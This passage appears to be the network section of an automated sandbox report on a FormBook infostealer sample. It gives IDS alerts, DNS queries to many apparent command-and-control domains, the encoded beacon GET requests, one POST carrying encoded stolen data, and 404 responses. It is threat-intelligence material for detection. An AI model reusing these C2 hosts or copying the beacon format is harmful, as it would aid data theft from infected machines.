Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 3.33.130.190:80
Source: DNS query: www.vasehub.xyz
Source: DNS query: www.moritynomxd.xyz
Source: Joe Sandbox View, IP Address: 52.20.84.62
Source: Joe Sandbox View, IP Address: 35.156.117.131
Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View, ASN Name: AMAZON-AESUS
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 identical entries)
Source: global traffic, HTTP traffic detected:
    GET /s7e8/?kf-HBx=Qf5nKOHOS6pOo2hqHNTD4NLxMOybGOQpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneAsTSYMh6rYvgLLbq+jq88smW47nOX2gz0M=&oFA=_z5x9B5 HTTP/1.1
    Host: www.specialgift.asia
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
    GET /lclg/?kf-HBx=qGNQqN428OgBR9iKpkadQRykwt+HrKy+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkGEuIwUpZoXbB9LzMpYZI6R6lH7jDDsD7jY=&oFA=_z5x9B5 HTTP/1.1
    Host: www.filelabel.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
    GET /ou1g/?kf-HBx=p6P+FgoGiP/G4Ng2k4kydfL9CEjREuwmc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4guZJ1Pjn+I9YPEKQsPJSCqhxwn7206Dyyk=&oFA=_z5x9B5 HTTP/1.1
    Host: www.multileveltravel.world
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
    GET /xqel/?kf-HBx=vvqDHEJ83RQMdUhh5kLoqoSDKB3hWQiq1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Kh5kUCFMd1INst0sGCzgDgfe+hjN7G6C4+s=&oFA=_z5x9B5 HTTP/1.1
    Host: www.40wxd.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
    GET /rhgo/?kf-HBx=1xwwfRv/EtrSMau8qPeCsOf3wKLyTBnoq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tBLzZBRYsir7YQhsB0BKwkYVMNCqueBTujA=&oFA=_z5x9B5 HTTP/1.1
    Host: www.vasehub.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
    GET /jp2s/?oFA=_z5x9B5&kf-HBx=P0qG7QiazDWD2BWelIei5OaE3G7F+t1+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4wdAdC4fEO7kU/4v+0UaEqAZT5BgARj9CDCY= HTTP/1.1
    Host: www.coffee-and-blends.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzJi3IqMGAEHDzAW40nPzBt7ZJ3Wrnor3ezI=&oFA=_z5x9B5 HTTP/1.1Host: www.tmstore.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /xia9/?kf-HBx=6Fbp2c2euLl3IpV1eF5M890ZMvcTOf/3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JQiLPTXJhO4ROr3CrWHqyrvdf750Ozu+jso=&oFA=_z5x9B5 HTTP/1.1Host: www.softillery.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /moqb/?oFA=_z5x9B5&kf-HBx=5S0MhnNpk6MkkLakdHV8bk6Gf6N5AAHlj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsTizlRh8nNBpgfm81WeJmiMGBZ7xhu/fL+Q= HTTP/1.1Host: www.nad5.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /esft/?kf-HBx=mVI2MUxphHC6Uw3f9xz7cF5W0X1TXhBjnHyqF3bL23emPksaKYEAojmfDw0HEL3vY5GLDWVdtCqn7MAr+1mql1KfONw8K+kkYDnWB0Nzinc0hknaPW1TnzQ=&oFA=_z5x9B5 HTTP/1.1Host: www.luxe.guruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /frw6/?kf-HBx=UG3twl1RTWICP6a+snMr6dqVChYRNbF04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRygeU7S1OzbuuspnSBo+prL8MhwcFbuUikZc=&oFA=_z5x9B5 HTTP/1.1Host: www.digitalbloom.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U+qX1dgM0j08UigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HJzLwgFpIUBewc3Sq/1ccTai3Bmxrp0U6E4=&oFA=_z5x9B5 HTTP/1.1Host: www.amitayush.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /d5je/?oFA=_z5x9B5&kf-HBx=joFU07nwohD6eVoe3rFlartiOObsWeCn1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iChOsBNMIjf68Qc2WylAI6LhtEtoF9GlVuo= HTTP/1.1Host: www.moritynomxd.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /h8b0/?kf-HBx=DRMewQ2K/nAxApdAjdq/8MBaTrmuK5PhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpjQD4u+ERF0y3CIErlIFDiiN/rGNNtD3azo=&oFA=_z5x9B5 HTTP/1.1Host: www.tukaari.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficDNS traffic detected: DNS query: www.specialgift.asia
                  Source: global trafficDNS traffic detected: DNS query: www.filelabel.info
                  Source: global trafficDNS traffic detected: DNS query: www.longfilsalphonse.net
                  Source: global trafficDNS traffic detected: DNS query: www.multileveltravel.world
                  Source: global trafficDNS traffic detected: DNS query: www.40wxd.top
                  Source: global trafficDNS traffic detected: DNS query: www.vasehub.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.coffee-and-blends.info
                  Source: global trafficDNS traffic detected: DNS query: www.tmstore.click
                  Source: global trafficDNS traffic detected: DNS query: www.softillery.info
                  Source: global trafficDNS traffic detected: DNS query: www.gemtastic.shop
                  Source: global trafficDNS traffic detected: DNS query: www.nad5.shop
                  Source: global trafficDNS traffic detected: DNS query: www.luxe.guru
                  Source: global trafficDNS traffic detected: DNS query: www.digitalbloom.info
                  Source: global trafficDNS traffic detected: DNS query: www.amitayush.digital
                  Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
                  Source: unknownHTTP traffic detected: POST /lclg/ HTTP/1.1Host: www.filelabel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.filelabel.infoReferer: http://www.filelabel.info/lclg/Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 203User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)Data Raw: 6b 66 2d 48 42 78 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 2f 72 32 30 6b 4c 6f 57 52 4c 6d 7a 37 4b 4c 6c 66 47 69 68 6c 70 57 6f 78 67 5a 57 4d 76 77 67 7a 6d 38 39 66 47 75 51 6f 51 66 72 72 69 4d 73 4a 51 45 46 6c 58 7a 45 65 43 68 46 6c 5a 48 37 63 37 35 75 4d 48 4c 38 46 30 75 44 6e 41 73 4f 75 66 4b 66 66 72 6d 57 62 77 61 4a 50 70 77 6a 45 61 55 58 52 67 74 30 6e 5a 39 73 51 59 46 58 4e 53 4f 48 41 76 56 39 35 6c 62 42 72 46 77 66 4d 50 79 74 71 77 50 4e 31 37 77 37 51 6b 49 67 49 73 56 2b 54 58 72 30 67 6e 37 43 39 55 79 4a 43 79 2b 43 67 48 35 69 62 34 47 56 49 67 30 41 55 4d 75 6f 67 3d 3d Data Ascii: kf-HBx=nElwp91d2c4kZ/r20kLoWRLmz7KLlfGihlpWoxgZWMvwgzm89fGuQoQfrriMsJQEFlXzEeChFlZH7c75uMHL8F0uDnAsOufKffrmWbwaJPpwjEaUXRgt0nZ9sQYFXNSOHAvV95lbBrFwfMPytqwPN17w7QkIgIsV+TXr0gn7C9UyJCy+CgH5ib4GVIg0AUMuog==
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 24 Oct 2024 06:01:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 2088Connection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Request-Id: f111254e20741f3ff67fadeaa7901cf1X-Runtime: 0.045698Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 79 6c 65 73 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 77 69 64 65 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 36 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 0a 20 20 20 20 28 66 75 6e 
63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 61 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 20 20 20 20 20 20 6d 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 61 2e 61 73 79 6e 63 3d 31 3b 61 2e 73 72 63 3d 67 3b 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 0a 20 20 20 20 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:02:28 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:02:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:02:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:02:35 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 